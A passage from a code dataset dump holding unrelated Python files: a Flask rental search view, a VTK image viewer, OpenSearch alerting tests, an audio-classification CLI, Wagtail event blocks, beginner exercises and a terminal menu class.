render_template('search.html')\r\n\r\n@house_blueprint.route('/house_search/',methods=['GET'])\r\ndef house_search():\r\n search_dict = request.args\r\n aid = search_dict.get('aid') #区域id\r\n sd = search_dict.get('sd') #开始时间\r\n ed = search_dict.get('ed') #结束时间\r\n # 通过区域id来搜索房间信息\r\n houses= House.query.filter(House.area_id==aid)\r\n #房东过滤掉自己的房屋信息\r\n if 'user_id' in session:\r\n houses = houses.filter(House.user_id != (session['user_id']))\r\n\r\n #判断搜索的开始时间结束时间和房屋订单的开始时间和结束时间\r\n order1 = Order.query.filter(Order.begin_date >= sd ,Order.begin_date <=ed ).all()\r\n order2 = Order.query.filter(Order.end_date >= sd ,Order.end_date <= ed).all()\r\n order3 = Order.query.filter(Order.begin_date <= sd, Order.end_date >= ed).all()\r\n order4 = Order.query.filter(Order.begin_date >= sd, Order.end_date <= ed).all()\r\n house_ids1 = [order.house_id for order in order1]\r\n house_ids2 = [order.house_id for order in order2]\r\n house_ids3 = [order.house_id for order in order3]\r\n house_ids4 = [order.house_id for order in order4]\r\n # 不需要搜索出来的房屋的id\r\n house_list_ids = list(set(house_ids1 + house_ids2 + house_ids3 + house_ids4))\r\n hlist = houses.filter(House.id.notin_(house_list_ids)).all()\r\n house_info = [house.to_dict() for house in hlist]\r\n return jsonify(code=status_code.MSG_OK,house_info=house_info)\r\n\r\n","sub_path":"aj/App/house_views.py","file_name":"house_views.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"296350663","text":"from actions import *\nfrom save import *\n\nresult = {}\nsequence = input('Input a sequence:')\nuser_azos = list(filter(letter_is_azot_osn, list(sequence)))\nprint('start sequence: ', user_azos)\n\naction = input('Input a action:')\n\nwhile action != 'stop':\n if action == 'show all':\n print(result)\n elif action[:5] == \"show \":\n key = action[5:]\n print(key, ':', result[key])\n elif action == 'save.py':\n save(result)\n elif action == 'load':\n result = load()\n elif action == 'add':\n result[action] = add_random(user_azos)\n elif action == 'delete':\n result[action] = delete_first(user_azos)\n elif action == 'mutation':\n result[action] = mutation(user_azos)\n elif action == 'rnd_mutation':\n result[action] = rnd_mutation(user_azos)\n else:\n result[action] = 'no data'\n # get next\n action = input('Input a action:')\n","sub_path":"lab10/lab10_1.py","file_name":"lab10_1.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"195058454","text":"\n# Imports\nimport argparse\nimport os\nimport vtk\n\nfrom bonelab.util.echo_arguments import echo_arguments\nfrom bonelab.io.vtk_helpers import get_vtk_reader\n\ndef SliceViewer(input_filename, window, level, nThreads):\n # Python 2/3 compatible input\n from six.moves import input\n\n # Read input\n if not os.path.isfile(input_filename):\n os.sys.exit('[ERROR] Cannot find file \\\"{}\\\"'.format(input_filename))\n\n # Set a minimum thread count\n nThreads = max(1, nThreads)\n\n # Read the input\n reader = get_vtk_reader(input_filename)\n if reader is None:\n os.sys.exit('[ERROR] Cannot find reader for file \\\"{}\\\"'.format(input_filename))\n\n print('Reading input image ' + input_filename)\n reader.SetFileName(input_filename)\n reader.Update()\n\n # Get scalar range for W/L and padding\n scalarRanges = reader.GetOutput().GetScalarRange()\n\n # Determine if we need to autocompute the window/level\n if window <= 0:\n window = scalarRanges[1] - scalarRanges[0]\n level = (scalarRanges[1] + scalarRanges[0])/2\n\n # Setup input Mapper + Property -> Slice\n inputMapper = vtk.vtkOpenGLImageSliceMapper()\n inputMapper.SetInputConnection(reader.GetOutputPort())\n inputMapper.SliceAtFocalPointOn()\n inputMapper.SliceFacesCameraOn()\n inputMapper.BorderOn()\n inputMapper.SetNumberOfThreads(nThreads)\n inputMapper.StreamingOn()\n\n imageProperty = vtk.vtkImageProperty()\n imageProperty.SetColorLevel(level)\n imageProperty.SetColorWindow(window)\n imageProperty.SetInterpolationTypeToNearest()\n\n inputSlice = vtk.vtkImageSlice()\n inputSlice.SetMapper(inputMapper)\n inputSlice.SetProperty(imageProperty)\n\n # Create Renderer -> RenderWindow -> RenderWindowInteractor -> InteractorStyle\n renderer = vtk.vtkRenderer()\n renderer.AddActor(inputSlice)\n\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n\n interactor = vtk.vtkRenderWindowInteractor()\n interactorStyle = vtk.vtkInteractorStyleImage()\n interactorStyle.SetInteractionModeToImageSlicing()\n interactorStyle.KeyPressActivationOn()\n\n interactor.SetInteractorStyle(interactorStyle)\n interactor.SetRenderWindow(renderWindow)\n\n # Add some functionality to switch layers for window/level\n def layerSwitcher(obj,event):\n if str(interactor.GetKeyCode()) == 'w':\n print(\"Image W/L: {w}/{l}\".format(w=imageProperty.GetColorWindow(), l=imageProperty.GetColorLevel()))\n elif str(interactor.GetKeyCode()) == 'n':\n # Set interpolation to nearest neighbour (good for voxel visualization)\n imageProperty.SetInterpolationTypeToNearest()\n interactor.Render()\n elif str(interactor.GetKeyCode()) == 'c':\n # Set interpolation to cubic (makes a better visualization)\n imageProperty.SetInterpolationTypeToCubic()\n interactor.Render()\n elif str(interactor.GetKeyCode()) == 'r':\n window = scalarRanges[1] - scalarRanges[0]\n level = (scalarRanges[1] + scalarRanges[0])/2\n imageProperty.SetColorLevel(level)\n imageProperty.SetColorWindow(window)\n interactor.Render()\n\n # Add ability to switch between active layers\n interactor.AddObserver('KeyPressEvent', layerSwitcher, -1.0) # Call layerSwitcher as last observer\n\n # Initialize and go\n interactor.Initialize()\n interactor.Start()\n\ndef main():\n # Setup description\n description='''2D slice visualizer\n\nThe following keyboard mappings are available:\n w Print window/Level to terminal\n n Set interpolator to nearest neighbour\n c Set interpolator to cubic\n r Reset window/level\n x View in x-plane\n y View in y-plane\n z View in z-plane\n q Quit\n\nThe following mouse mappings are available:\n left click + vertical scroll Modify window\n left click + horizontal scroll Modify level\n right click + vertical scroll Zoom\n control + left click + vertical scroll Slice level\n control + right click + vertical scroll Rotate slice\n shift + left click + vertical scroll Translate slice\n'''\n\n # Setup argument parsing\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter,\n prog=\"blSliceViewer\",\n description=description\n )\n parser.add_argument('input_filename', help='Input image file')\n parser.add_argument('--window',\n default=float(0), type=float,\n help='The initial window. If window is zero or less, the window is computed from the dynamic range of the image.')\n parser.add_argument('--level',\n default=float(0), type=float,\n help='The initial level. If window is zero or less, the level is computed from the dynamic range of the image.')\n parser.add_argument('--nThreads', '-n', \n default=int(1), type=int,\n help='Number of threads for each image slice visualizer (default: %(default)s)')\n\n # Parse and display\n args = parser.parse_args()\n print(echo_arguments('SliceViewer', vars(args)))\n\n # Run program\n SliceViewer(**vars(args))\n\nif __name__ == '__main__':\n main()\n","sub_path":"bonelab/cli/SliceViewer.py","file_name":"SliceViewer.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"351372413","text":"from src.experiments import run_experiment\nfrom src.parse_args import parser\n\n\nif __name__ == '__main__':\n config = {\n 'data_dir':'../data/umls',\n 'train':True,\n 'model':'point',\n 'bandwidth':400,\n 'entity_dim':200,\n 'relation_dim':200,\n 'history_dim':200,\n 'history_num_layers':3,\n 'num_rollouts':20,\n 'num_rollout_steps':2,\n 'bucket_interval':10,\n 'num_epochs':3,\n 'num_wait_epochs':200,\n 'num_peek_epochs':2,\n 'batch_size':128,\n 'train_batch_size':128,\n 'dev_batch_size':32,\n 'margin':1,\n 'learning_rate':0.001,\n 'baseline':'n/a',\n 'grad_norm':0,\n 'emb_dropout_rate':0.3,\n 'ff_dropout_rate':0.1,\n 'action_dropout_rate':0.9,\n 'action_dropout_anneal_interval':1000,\n 'beta':0.05,\n 'beam_size':128,\n 'num_path_per_entity':-1,\n 'use_action_space_bucketing':True,\n 'gpu':0\n\n }\n args,_ = parser.parse_known_args()\n [setattr(args,k,v) for k,v in config.items()]\n run_experiment(args)\n","sub_path":"src/run_experiment_with_config.py","file_name":"run_experiment_with_config.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"621626209","text":"#!/bin/env python3\n# -*- coding: iso8859-1 -*-\n\nimport os\nimport time\nfrom sys import *\nimport librosa\nimport matplotlib as plt\nimport argparse\n#os.path.append(getcwd()+\"spectrogram/\")\n#os.path.append(getcwd()+\"preprocessing/\")\n\nimport utils\nfrom spectrogram import spectrogram\nfrom preprocessing import preprocessing\nfrom preprocessing import audio\nfrom spectrogram import melSpectrogram\nfrom models import Model\nfrom models import cnn\nfrom models import vgg16\nutils.createFolder()\n\nparser = argparse.ArgumentParser(description='lgi2p-alose')\n\nparser.add_argument('-s','--spectrogram',help='Get all wav audio files from directory and compute the spectrogram of each file. t args allow to process png spectrogram, f args only process spectrogram data')\n\nparser.add_argument('-p','--preprocessing',help='Get a directory with audio files and splits them it into a shorter and create annotated file. If a number is written after the p arg, it will be the size of the cutted audio')\n\nparser.add_argument('-cnn','--convolutionalnetwork',help='Convolutional neural network')\n\nparser.add_argument('-cnnt','--testcnn',help='Test an audio file with convolutional network')\n\n\nparser.add_argument('-vgg','--vggconvolutionalnetwork',help='Convolutional network with pre-trained model. Args: \"a\" change all the layer of vgg16, \"l\" change the last layer ')\n\nparser.add_argument('-as','--analysis',help='Visualizing sounds')\n\n\n\n\nargs = parser.parse_args()\n\n'''\nSection dedicated to the convolutional neural network\n\n'''\nif args.convolutionalnetwork:\n if args.convolutionalnetwork ==\"b\":\n cnn = cnn.cnn()\n cnn.load()\n cnn.launch()\n\n if args.convolutionalnetwork==\"us\":\n cnn = cnn.cnn()\n cnn.loadUnderSampling()\n cnn.launch()\n\n if args.convolutionalnetwork==\"os\":\n cnn = cnn.cnn()\n cnn.load(True)\n cnn.launch()\n\n if args.convolutionalnetwork==\"uos\":\n cnn = cnn.cnn()\n cnn.load(True)\n cnn.launch()\n\n if args.convolutionalnetwork==\"of\":\n pass\n\n if args.convolutionalnetwork ==\"cm\":\n cnn = cnn.cnn()\n cnn.load()\n cnn.testModel(\"cnn\")\n\n else:\n print(\"Wrong arg for convolutional network\")\n\nif args.testcnn:\n cnn = cnn.cnn()\n cnn.predictAudio(args.testcnn.strip('\"'))\n\n\n\nif args.vggconvolutionalnetwork:\n\n if args.vggconvolutionalnetwork==\"b\":\n vgg = vgg16.vgg()\n vgg.load()\n vgg.launch()\n\n if args.vggconvolutionalnetwork==\"us\":\n vgg = vgg16.vgg()\n vgg.loadUnderSampling()\n vgg.launch()\n\n if args.vggconvolutionalnetwork==\"os\":\n vgg = vgg16.vgg()\n vgg.load(True)\n vgg.launch()\n\n if args.vggconvolutionalnetwork==\"uos\":\n vgg = vgg16.vgg()\n vgg.loadUnderSampling(True)\n vgg.launch()\n\n if args.vggconvolutionalnetwork==\"llb\":\n vgg = vgg16.vgg()\n vgg.load()\n vgg.launchLastLayer()\n\n if args.vggconvolutionalnetwork==\"llus\":\n vgg = vgg16.vgg()\n vgg.loadUnderSampling()\n vgg.launchLastLayer()\n\n if args.vggconvolutionalnetwork==\"llos\":\n vgg = vgg16.vgg()\n vgg.load(True)\n vgg.launchLastLayer()\n\n if args.vggconvolutionalnetwork==\"lluos\":\n vgg = vgg16.vgg()\n vgg.loadUnderSampling(True)\n vgg.launchLastLayer()\n\n if args.convolutionalnetwork ==\"cm\":\n cnn = cnn.cnn()\n cnn.load()\n cnn.testModel(\"vgg\")\n\n\n\n\n\n\n\n\n else :\n print(\"Wrong arg\")\n\nif args.spectrogram:\n utils.deleteMelSpectrogram()\n if args.spectrogram[0]:\n if args.spectrogram[0]=='t':\n spectrogram = spectrogram.spectrogram()\n spectrogram.melSpectrogram(True)\n if args.spectrogram[0]=='f':\n spectrogram = spectrogram.spectrogram()\n spectrogram.melSpectrogram(False)\n else:\n print(\"Errorr wrong arg\")\n exit()\n else:\n spectrogram = spectrogram.spectrogram()\n spectrogram.melSpectrogram()\n\nif args.preprocessing:\n utils.deletePreprocessing()\n preprocessing = preprocessing.preprocessing(args.preprocessing.strip('\"'))\n\n duration = input(\"Type the length of cutted audio. Or push enter for default duration (10 s): \")\n\n if len(duration)==0:\n preprocessing.trimmingAudio()\n else:\n duration = int(duration)\n preprocessing.trimmingAudio(44100,duration)\n\nif args.analysis:\n #try:\n x,sr = librosa.load(args.analysis.strip('\"'))\n utils.inspect_data(x)\n #except:\n #print(\"Path error\")\n","sub_path":"alose.py","file_name":"alose.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"385014204","text":"import datetime\nfrom datetime import date\nimport math\n\n#date & time\nprint(\"datetime:\")\nprint(datetime.datetime.now())\nprint(\"--------------------------\")\n\n#area of circle\nradius = float(input(\"enter the radius:\"))\narea = math.pi * pow(radius, 2)\nprint(\"area of circle is:\",area )\nprint(\"--------------------------\")\n\n#create list & tuple\ninput_seq = input(\"enter the number sequence: \")\nsplit_seq = input_seq.split(\",\")\nlist = []\nfor seq in split_seq:\n\tlist.extend(seq)\t\nprint(\"list : \",list)\nprint(\"tuple : \",tuple(list))\t\nprint(\"--------------------------\")\n\n#returning file extention\nfilename = input(\"enter the file name : \")\next = filename.split(\".\")\nprint(\"extention of file is: \",ext[1])\nprint(\"--------------------------\")\n\n#input = n;output = n+nn+nnn\nnumber = int(input(\"enter a number : \"))\ncount = 1\nresult =0\nwhile(count <= number):\n\ttemp = number ** count\n\tresult = result + temp\n\tcount = count + 1;\nprint(\"output : \",result)\nprint(\"--------------------------\")\n\n#return the difference of date\ndef diff_dates(d1,d2):\n\tdiff = d1-d2\n\tprint(\"number of days:\",diff.days)\n\treturn\nprint(\"difference between (1995,5,5) and (1995,1,7)\")\ndiff_dates(date(1995,5,5),date(1995,1,7))\nprint(\"--------------------------\") \n\t\t\n\n\n\t\n\n","sub_path":"madhuselvaraj/python-basics/basics1.py","file_name":"basics1.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"324887267","text":"# -*- coding: utf-8 -*-\n# SPDX-License-Identifier: Apache-2.0\n#\n# The OpenSearch Contributors require contributions made to\n# this file be licensed under the Apache-2.0 license or a\n# compatible open source license.\n#\n# Modifications Copyright OpenSearch Contributors. See\n# GitHub history for details.\n\n\nfrom __future__ import unicode_literals\n\nimport unittest\n\nimport pytest\n\nfrom opensearchpy.helpers.test import OPENSEARCH_VERSION\n\nfrom .. import AsyncOpenSearchTestCase\n\npytestmark = pytest.mark.asyncio\n\n\nclass TestAlertingPlugin(AsyncOpenSearchTestCase):\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_create_destination(self):\n # Test to create alert destination\n dummy_destination = {\n \"name\": \"my-destination\",\n \"type\": \"slack\",\n \"slack\": {\"url\": \"http://www.example.com\"},\n }\n response = await self.client.alerting.create_destination(dummy_destination)\n\n self.assertNotIn(\"errors\", response)\n self.assertIn(\"_id\", response)\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_get_destination(self):\n # Create a dummy destination\n await self.test_create_destination()\n\n # Try fetching the destination\n response = await self.client.alerting.get_destination()\n\n self.assertNotIn(\"errors\", response)\n self.assertGreaterEqual(response[\"totalDestinations\"], 1)\n self.assertEqual(response[\"totalDestinations\"], len(response[\"destinations\"]))\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_create_monitor(self):\n # Create a dummy destination\n await self.test_create_destination()\n\n # Try fetching the destination\n destination = await self.client.alerting.get_destination()\n self.assertGreaterEqual(\n destination[\"totalDestinations\"],\n 1,\n \"No destination entries found in the database.\",\n )\n\n # Select the first destination available\n destination = destination[\"destinations\"][0]\n\n # A dummy schedule for 1 minute interval\n schedule = {\"period\": {\"interval\": 1, \"unit\": \"MINUTES\"}}\n\n # A dummy query fetching everything\n query = {\"query\": {\"query_string\": {\"query\": \"*\"}}}\n\n # A dummy action with the dummy destination\n action = {\n \"name\": \"test-action\",\n \"destination_id\": destination[\"id\"],\n \"message_template\": {\"source\": \"This is my message body.\"},\n \"throttle_enabled\": True,\n \"throttle\": {\"value\": 27, \"unit\": \"MINUTES\"},\n \"subject_template\": {\"source\": \"TheSubject\"},\n }\n\n # A dummy trigger with the dummy action\n triggers = {\n \"name\": \"test-trigger\",\n \"severity\": \"1\",\n \"condition\": {\n \"script\": {\n \"source\": \"ctx.results[0].hits.total.value > 0\",\n \"lang\": \"painless\",\n }\n },\n \"actions\": [action],\n }\n\n # A dummy monitor with the dummy schedule, dummy query, dummy trigger\n monitor = {\n \"type\": \"monitor\",\n \"name\": \"test-monitor\",\n \"monitor_type\": \"query_level_monitor\",\n \"enabled\": True,\n \"schedule\": schedule,\n \"inputs\": [{\"search\": {\"indices\": [\"*\"], \"query\": query}}],\n \"triggers\": [triggers],\n }\n\n response = await self.client.alerting.create_monitor(monitor)\n\n self.assertNotIn(\"errors\", response)\n self.assertIn(\"_id\", response)\n self.assertIn(\"monitor\", response)\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_search_monitor(self):\n # Create a dummy monitor\n await self.test_create_monitor()\n\n # Create a monitor search query by it's name\n query = {\"query\": {\"match\": {\"monitor.name\": \"test-monitor\"}}}\n\n # Perform the search with the above query\n response = await self.client.alerting.search_monitor(query)\n\n self.assertNotIn(\"errors\", response)\n self.assertIn(\"hits\", response)\n self.assertEqual(response[\"hits\"][\"total\"][\"value\"], 1, \"No monitor found.\")\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_get_monitor(self):\n # Create a dummy monitor\n await self.test_create_monitor()\n\n # Create a monitor search query by it's name\n query = {\"query\": {\"match\": {\"monitor.name\": \"test-monitor\"}}}\n\n # Perform the search with the above query\n response = await self.client.alerting.search_monitor(query)\n\n # Select the first monitor\n monitor = response[\"hits\"][\"hits\"][0]\n\n # Fetch the monitor by id\n response = await self.client.alerting.get_monitor(monitor[\"_id\"])\n\n self.assertNotIn(\"errors\", response)\n self.assertIn(\"_id\", response)\n self.assertIn(\"monitor\", response)\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_run_monitor(self):\n # Create a dummy monitor\n await self.test_create_monitor()\n\n # Create a monitor search query by it's name\n query = {\"query\": {\"match\": {\"monitor.name\": \"test-monitor\"}}}\n\n # Perform the search with the above query\n response = await self.client.alerting.search_monitor(query)\n\n # Select the first monitor\n monitor = response[\"hits\"][\"hits\"][0]\n\n # Run the monitor by id\n response = await self.client.alerting.run_monitor(monitor[\"_id\"])\n\n self.assertEqual(response[\"error\"], None)\n self.assertIn(\"monitor_name\", response)\n self.assertIn(\"period_start\", response)\n self.assertIn(\"period_end\", response)\n","sub_path":"test_opensearchpy/test_async/test_server/test_plugins/test_alerting.py","file_name":"test_alerting.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"438160816","text":"def SumFactor(num):\n\tsum=0\n\tfor i in range(1,int((num/2))+1,1):\n\t\tif(num % i == 0):\n\t\t\tsum += i\n\treturn sum\n\nno=int(input(\"Enter a number\"))\nret=SumFactor(no)\nprint(ret)\t\n","sub_path":"Assignment 2/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"473173668","text":"#FLM: Remove Unicode from Selected Glyphs\nselection = []\n\ndef getSel(font, glyph, gindex):\n\tselection.append(gindex)\nfl.ForSelected(getSel)\n\nbackupUNI = False\n\nfor gIndex in selection:\n\tg = fl.font[gIndex]\n\tbackupName = g.name+\"-oldUNI_\"+str(g.unicode)\n\tif (backupUNI == True) : g.name = backupName\n\tg.unicode = 0\nfl.UpdateFont(fl.ifont)","sub_path":"code_snippets/python/scripts/RemoveUnicode.py","file_name":"RemoveUnicode.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"272440359","text":"from google import google\n\nclass Search():\n def __init__(self, query, url, depth):\n self._query = query\n self._url = url\n self._depth = depth\n def search(self):\n search_result = google.search(\"travel\", 1)\n for s in search_result:\n print(s.link)\n print(s.google_link)\nif __name__ == \"__main__\":\n searcher = Search(\"travel\", \"clearmindtravel\", 1)\n searcher.search()","sub_path":"venv/app/searcher/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"100103419","text":"from wagtail.core.blocks import StructBlock\nfrom wagtail.embeds.blocks import EmbedBlock\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom wagtail.core import blocks\nimport datetime\nfrom wagtailmodelchooser.blocks import ModelChooserBlock\nfrom django.utils.translation import ugettext_lazy as _\n\nclass QuickLinkValue(blocks.StructValue):\n @property\n def url(self):\n if self.get('external_link'):\n return self['external_link']\n elif self['page']:\n return self['page'].url\n else:\n return None\n\nclass PromotedEventBlock(StructBlock):\n title = blocks.CharBlock(required=True, label=\"Title\")\n description = blocks.CharBlock(required=True, label=\"Description\")\n date = blocks.DateBlock()\n time = blocks.TimeBlock(required=True)\n display_type = blocks.ChoiceBlock(choices=[\n ('text', 'Text'),\n ('image', 'Image'),\n ('video', 'video'),\n ], icon = 'cup', default=\"text\")\n picture = ImageChooserBlock( required=False)\n embed = EmbedBlock(required=False)\n video_min_height = blocks.CharBlock(required=False, default=\"300px\")\n external_link = blocks.URLBlock(required=False, label=\"external_link\")\n page = blocks.PageChooserBlock(label=\"page\", required=False, help_text=\"Link a Page\")\n link_text = blocks.CharBlock(required=True, label=\"Button Text\", help_text=\"e.g Register Now\")\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context=parent_context)\n context['is_happening_today'] = (value['date'] == datetime.date.today())\n return context\n class Meta:\n icon = 'media'\n label = \"Promoted Event\"\n template = \"event/blocks/PromotedEvent.html\"\n value_class = QuickLinkValue\n\n\nclass SpeakerBlock(blocks.StructBlock):\n speaker = ModelChooserBlock('event.Speaker')\n is_featured_guest = blocks.BooleanBlock(default=False, required=False)\n class Meta:\n icon = 'media'\n label = \"Speaker\"\n template = \"event/blocks/speaker.html\"\n\nclass EventSessionBlock(blocks.StructBlock):\n title = blocks.CharBlock(required=True, label=_(\"Date label\"))\n agenda = blocks.ListBlock(blocks.StructBlock([\n ('agenda', ModelChooserBlock('event.Agenda'))\n ]))\n class Meta:\n icon = 'media'\n label = \"Event Session\"\n template = \"event/blocks/session.html\"\n\n\nclass TicketBlock(blocks.StructBlock):\n button_text = blocks.CharBlock(default=\"Buy Ticket\")\n tickets = blocks.ListBlock(blocks.StructBlock([\n ('page', blocks.PageChooserBlock(required=True, target_model='shop.Product'))\n ])) \n class Meta:\n icon = 'media'\n label = \"Ticket Block\"\n template = \"event/blocks/TicketBlock.html\"","sub_path":"event/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"232449345","text":"# shebang para UNIX: #!/usr/local/bin/python3\r\n\r\nimport math\r\nimport sys\r\nimport errno\r\n\r\n\r\ndef circulo(raio):\r\n \"\"\"\r\n Cálculo da área\r\n \"\"\"\r\n return math.pi * float(raio) ** 2\r\n\r\n\r\ndef help():\r\n print(f\"\"\"\\\r\n É necessário informar o raio do círculo\r\n Sintaxe: {sys.argv[0]} \"\"\")\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n if len(sys.argv) < 2:\r\n help()\r\n # sys.exit(1) #Exit termina o arquivo. sysexit(1) de forma bem sucedida, qualquer outro número mostra erro.\r\n sys.exit(errno.EPERM) # errno.EPERM é o próprio número 1\r\n\r\n elif not sys.argv[1].isnumeric():\r\n help()\r\n print('O raio deve ser um valor numérico')\r\n sys.exit(errno.EINVAL)\r\n\r\n else:\r\n raio = sys.argv[1]\r\n area = circulo(raio)\r\n # print(sys.argv[0])\r\n print('Area do círculo: ', area)\r\n","sub_path":"anotacoes_curso/fundamentos_projetos/area_circulo_v9.py","file_name":"area_circulo_v9.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"369330990","text":"import tensorflow as tf\nimport numpy as np\nimport _hangle as hangle\n\nimport processing as tool\nimport os\nfrom tensorflow.contrib import learn\n\ncorpus = []\n\n# elem = []\n# elem.append(\"원하는 문장\")\n# elem.append(0)\n# corpus.append(elem)\n\n# corpus = np.array(corpus)\ncontents = []\ncontents.append(hangle.normalize(\"배그 최고\", english=True, number=True, punctuation=False))\ncontents.append(hangle.normalize(\"옵치에서 한남충새끼가 가오잡고 돼지멱따는소리내길래\", english=True, number=True, punctuation=False))\ncontents.append(hangle.normalize(\"출연진보면 시청자 30만은 찍어야 평타치는건데\", english=True, number=True, punctuation=False))\ncontents.append(hangle.normalize(\"슈라우드 글옵프로시절 팀메한테 스쿼드 전멸당했네 ㅋㅋ\", english=True, number=True, punctuation=False))\ncontents.append(hangle.normalize(\"딩셉션은 진짜 배그계의 대표 꼰대 다른말로 적폐 그자체였는데\", english=True, number=True, punctuation=False))\n\ncontents = tool.cut(contents, cut=2)\nprint(contents)\n\n# vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(200) # 객체 선언\nvocab_path = os.path.join(\"./\", \"vocab\")\nvocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\nx_test = np.array(list(vocab_processor.fit_transform(contents)))\n\n# Evaluation\n# ==================================================\n# checkpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\ngraph = tf.Graph()\nwith graph.as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False)\n sess = tf.Session(config=session_conf)\n with sess.as_default():\n # Load the saved meta graph and restore variables\n saver = tf.train.import_meta_graph('model-29300.meta')\n saver.restore(sess, 'model-29300')\n\n # Get the placeholders from the graph by name\n input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\n # input_y = graph.get_operation_by_name(\"input_y\").outputs[0]\n dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\n\n # Tensors we want to evaluate\n predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\n\n def batch_iter(data, batch_size, num_epochs, shuffle=True):\n \"\"\"\n Generates a batch iterator for a dataset.\n \"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]\n\n\n # Generate batches for one epoch\n batches = batch_iter(list(x_test), 64, 1, shuffle=False)\n\n # Collect the predictions here\n all_predictions = []\n\n for x_test_batch in batches:\n batch_predictions = sess.run(predictions, {input_x: x_test_batch, dropout_keep_prob: 1.0})\n all_predictions = np.concatenate([all_predictions, batch_predictions])\n print(all_predictions)","sub_path":"image_and_dcinside/dcinside_src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"513509599","text":"from .common import menuItem, echo, singleton\nfrom .window import Window\n\nclass MainMenu(Window):\n menu = None\n\n def __init__(self, name=\"main\"):\n super().__init__()\n\n # self.term = Terminal()\n self.screen_id = self.screen.bind()\n\n self.selection = 0\n self.left_top_corner = \"\\u250c\"\n self.right_top_corner = \"\\u2510\"\n self.left_bottom_corner = \"\\u2514\"\n self.right_bottom_corner = \"\\u2518\"\n self.hor_line = \"\\u2500\"\n self.vert_line = \"\\u2502\"\n\n self.next_select = [\"KEY_TAB\", \"KEY_RIGHT\"]\n self.prev_select = \"KEY_LEFT\"\n self.escape = [\"KEY_ESCAPE\"]\n\n self.background_clr = \"magenta\"\n self.cursor_back_clr = \"bold_red_reverse\"\n self.disabled_pos_clr = 'ivory4_reverse'\n self.text_clr = \"white\"\n\n self.position = \"top\"\n self.gap = 6\n self.left_gap = 1\n self.focus_owner = False\n self.sub_menu_focus = False\n self.parent = None\n self.sub = None\n self.name = name\n\n self.width = self.term.width\n\n if self.position == \"top\":\n self.menu_x = 1\n self.menu_y = 1\n elif self.position == \"bottom\":\n self.menu_x = 1\n self.menu_y = self.term.height - 1\n\n def is_menu(self) -> bool:\n return True\n\n def set_handle(self, handle: int = -1):\n handle = -1\n\n def __make_menu_item(self, m_item):\n menu_name:str = m_item[0]\n menu_name = menu_name.replace(' ', '_')\n setattr(self, menu_name, menuItem(m_item[0], m_item[1], m_item[2], m_item[3]))\n\n def set_menu(self, menu: list = None):\n self.menu = menu\n if self.menu is not None:\n 